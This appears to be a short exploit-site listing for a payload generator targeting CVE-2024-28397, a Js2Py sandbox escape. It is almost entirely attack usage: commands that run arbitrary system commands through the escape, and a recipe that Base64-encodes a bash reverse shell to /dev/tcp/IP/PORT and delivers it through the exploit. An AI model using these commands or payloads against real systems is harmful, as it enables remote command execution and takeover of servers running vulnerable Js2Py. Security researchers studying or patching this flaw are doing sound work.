Share
## https://sploitus.com/exploit?id=E948C956-ACE1-5431-8E31-16EDEA132F5A
# CVE-2024-28397 - Js2Py Sandbox Escape Payload Generator
This script generates a JavaScript payload that can be evaluated by Js2Py in vulnerable environments where Python internals are exposed through object wrappers.
## Usage
Basic command execution:
```bash
python3 cve-2024-28397.py -c "id"
```
Generate a compact one-line payload:
```bash
python3 cve-2024-28397.py -c "whoami" --compact
```
## Reverse Shell with Base64
Generate the Base64 payload:
```bash
echo 'bash -i >& /dev/tcp/IP/PORT 0>&1' | base64 -w0
```
Generate the Js2Py payload:
```bash
python3 cve-2024-28397.py -c "bash -c 'echo BASE64_OUTPUT | base64 -d | bash'" --compact
```
Replace `BASE64_OUTPUT` with the Base64 string generated in the first step.